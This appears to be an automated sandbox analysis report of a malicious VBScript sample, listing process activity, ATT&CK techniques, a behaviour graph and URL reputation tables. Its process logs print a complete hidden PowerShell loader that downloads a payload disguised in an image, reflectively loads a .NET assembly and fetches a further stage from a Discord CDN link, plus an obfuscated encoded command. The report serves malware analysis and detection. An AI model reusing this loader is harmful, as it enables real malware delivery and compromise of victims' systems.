        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('&68912521d95e50412d355d520cfde21ed0d1e15609fe2233fcb0652f4755ccfa=mh&ce1d0566=si&c6322566=xe?txt.mak/8138417472850263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'c:\programdata\' , 'cognitivo','regasm',''))} }"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredgdgtrenqdgtrevdgtredcdgtremgdgtrewdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredydgtremwdgtrewdgtredcdgtrengdgtrezdgtredqdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('&68912521d95e50412d355d520cfde21ed0d1e15609fe2233fcb0652f4755ccfa=mh&ce1d0566=si&c6322566=xe?txt.mak/8138417472850263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'c:\programdata\' , 'cognitivo','regasm',''))} }"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information231
        Scripting
        Valid Accounts11
        Command and Scripting Interpreter
        231
        Scripting
        111
        Process Injection
        1
        Masquerading
        OS Credential Dumping1
        Security Software Discovery
        Remote Services1
        Archive Collected Data
        1
        Web Service
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution
        11
        Registry Run Keys / Startup Folder
        11
        Registry Run Keys / Startup Folder
        21
        Virtualization/Sandbox Evasion
        LSASS Memory1
        Process Discovery
        Remote Desktop ProtocolData from Removable Media11
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts3
        PowerShell
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        111
        Process Injection
        Security Account Manager21
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive3
        Ingress Tool Transfer
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
        Obfuscated Files or Information
        NTDS1
        Application Window Discovery
        Distributed Component Object ModelInput Capture3
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Software Packing
        LSA Secrets1
        File and Directory Discovery
        SSHKeylogging14
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain Credentials12
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1448042 Sample: kam.vbs Startdate: 27/05/2024 Architecture: WINDOWS Score: 100 31 paste.ee 2->31 33 uploaddeimagens.com.br 2->33 35 cdn.discordapp.com 2->35 45 Multi AV Scanner detection for domain / URL 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 53 9 other signatures 2->53 10 wscript.exe 14 2->10         started        14 wscript.exe 2->14         started        16 wscript.exe 2->16         started        signatures3 51 Connects to a pastebin service (likely for C&C) 31->51 process4 dnsIp5 39 uploaddeimagens.com.br 188.114.96.3, 443, 49710, 49711 CLOUDFLARENETUS European Union 10->39 59 System process connects to network (likely due to code injection or exploit) 10->59 61 VBScript performs obfuscated calls to suspicious functions 10->61 63 Suspicious powershell command line found 10->63 67 4 other signatures 10->67 18 powershell.exe 7 10->18         started        65 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->65 signatures6 process7 signatures8 41 Suspicious powershell command line found 18->41 43 Found suspicious powershell code related to unpacking or dynamic code loading 18->43 21 powershell.exe 15 17 18->21         started        25 conhost.exe 18->25         started        process9 dnsIp10 37 cdn.discordapp.com 162.159.134.233, 443, 49720 CLOUDFLARENETUS United States 21->37 55 Suspicious powershell command line found 21->55 57 Creates autostart registry keys with suspicious values (likely registry only malware) 21->57 27 powershell.exe 10 21->27         started        signatures11 process12 process13 29 conhost.exe 27->29         started       

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        paste.ee3%VirustotalBrowse
        cdn.discordapp.com0%VirustotalBrowse
        uploaddeimagens.com.br5%VirustotalBrowse
        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
        http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://analytics.paste.ee0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        http://crl.v0%URL Reputationsafe
        https://secure.gravatar.com0%URL Reputationsafe
        https://themes.googleusercontent.com0%URL Reputationsafe
        https://paste.ee/d/c2iY10%Avira URL Cloudsafe
        https://paste.ee/d/c2iY1h0%Avira URL Cloudsafe
        https://paste.ee/d/c2iY1l0%Avira URL Cloudsafe
        https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634100%Avira URL Cloudmalware
        https://www.google.com;0%Avira URL Cloudsafe
        https://paste.ee/d/c2iY180%Avira URL Cloudsafe
        http://uploaddeimagens.com.br0%Avira URL Cloudsafe
        https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?171630763413%VirustotalBrowse
        https://paste.ee/d/c2iY140%Avira URL Cloudsafe
        http://uploaddeimagens.com.br5%VirustotalBrowse
        https://paste.ee/d/c2iY1t0%Avira URL Cloudsafe
        https://github.com/Pester/Pester0%Avira URL Cloudsafe
        https://www.google.com0%Avira URL Cloudsafe
        https://uploaddeimagens.com.br0%Avira URL Cloudsafe
        https://paste.ee/0%Avira URL Cloudsafe
        https://analytics.paste.ee;0%Avira URL Cloudsafe
        https://cdnjs.cloudflare.com0%Avira URL Cloudsafe
        https://uploaddeimagens.com.br7%VirustotalBrowse
        https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
        https://paste.ee/1%VirustotalBrowse
        https://cdn.discordapp.com/attachments/1235627023511191643/1243620582747148318/kam.txt?ex=6652236c&is=6650d1ec&hm=afcc5574f2560bcf3322ef90651e1d0de12edfc025d553d21405e59d12521986&0%Avira URL Cloudsafe
        https://github.com/Pester/Pester1%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        paste.ee
        188.114.96.3
        truetrueunknown
        cdn.discordapp.com
        162.159.134.233
        truefalseunknown
        uploaddeimagens.com.br
        188.114.96.3
        truetrueunknown
        NameMaliciousAntivirus DetectionReputation
        https://paste.ee/d/c2iY1true
        • Avira URL Cloud: safe
        unknown
        https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634true
        • 13%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        https://cdn.discordapp.com/attachments/1235627023511191643/1243620582747148318/kam.txt?ex=6652236c&is=6650d1ec&hm=afcc5574f2560bcf3322ef90651e1d0de12edfc025d553d21405e59d12521986&false
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.2545679147.0000013FA62AD000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        https://paste.ee/d/c2iY1hwscript.exe, 00000000.00000003.2121976786.00000185E882E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125599835.00000185E882F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121956771.00000185E8824000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2320773596.0000013F96463000.00000004.00000800.00020000.00000000.sdmptrue
        • URL Reputation: malware
        unknown
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2320773596.0000013F96463000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://contoso.com/Licensepowershell.exe, 00000005.00000002.2545679147.0000013FA62AD000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://paste.ee/d/c2iY1lwscript.exe, 00000000.00000002.2124868255.00000185E6805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121995772.00000185E67DF000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://www.google.com;wscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://contoso.com/Iconpowershell.exe, 00000005.00000002.2545679147.0000013FA62AD000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://analytics.paste.eewscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://paste.ee/d/c2iY18wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://uploaddeimagens.com.brpowershell.exe, 00000005.00000002.2320773596.0000013F9C73D000.00000004.00000800.00020000.00000000.sdmpfalse
        • 5%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://paste.ee/d/c2iY14wscript.exe, 00000000.00000003.2121976786.00000185E882E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125599835.00000185E882F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121956771.00000185E8824000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://paste.ee/d/c2iY1twscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2320773596.0000013F96463000.00000004.00000800.00020000.00000000.sdmpfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://www.google.comwscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://uploaddeimagens.com.brpowershell.exe, 00000005.00000002.2320773596.0000013F96463000.00000004.00000800.00020000.00000000.sdmptrue
        • 7%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://contoso.com/powershell.exe, 00000005.00000002.2545679147.0000013FA62AD000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.2545679147.0000013FA62AD000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://paste.ee/wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmptrue
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://analytics.paste.ee;wscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://cdnjs.cloudflare.comwscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://aka.ms/pscore68powershell.exe, 00000003.00000002.2675899972.000001B7D74AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2675899972.000001B7D745F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2320773596.0000013F96241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2312727802.0000025D00047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2312727802.0000025D0005C000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
